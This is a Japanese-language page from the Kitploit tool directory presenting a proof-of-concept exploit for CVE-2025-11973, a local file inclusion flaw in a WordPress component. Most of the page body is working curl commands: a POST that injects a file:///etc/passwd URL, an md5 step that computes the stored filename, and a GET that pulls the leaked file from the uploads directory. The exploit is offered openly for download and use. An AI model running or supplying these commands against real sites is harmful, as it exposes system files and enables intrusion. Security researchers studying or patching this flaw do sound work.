Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-11973 — CVE-2025-11973 の概念実証エクスプロイト。WordPress において file:// プロトコルを介したローカルファイルインクルージョン (LFI) を実証し、/etc/passwd をアップロードディレクトリに自動的に流出させます。 | Kitploit
ツール/GitHubGitHub/jfriedli/cve-2025-11973
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集
GitHubjfriedli/cve-2025-11973

CVE-2025-11973

CVE-2025-11973 の概念実証エクスプロイト。WordPress において file:// プロトコルを介したローカルファイルインクルージョン (LFI) を実証し、/etc/passwd をアップロードディレクトリに自動的に流出させます。

リポジトリを見る
25ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

トリガー: /etc/passwd を file:// 経由で読み取り、アップロードに流出させる

root@kitploit:~
curl -sS -A "$UA" -X POST "$BASE/?__kds_flag=post" \
  --data-urlencode "kds_password=$SECRET" \
  --data-urlencode "post_title=sub1-lfi" \
  --data-urlencode "__kds_feature_url=file:///etc/passwd"

流出したファイルを取得する

保存されたファイル名を計算する

root@kitploit:~
HASH=$(printf 'file:///etc/passwd' | md5sum | awk '{print $1}')

ファイルを取得する

root@kitploit:~
curl -sS -A "$UA" "$BASE/wp-content/uploads/$YMD/${HASH}.jpg" | head -n 25
ツールをダウンロード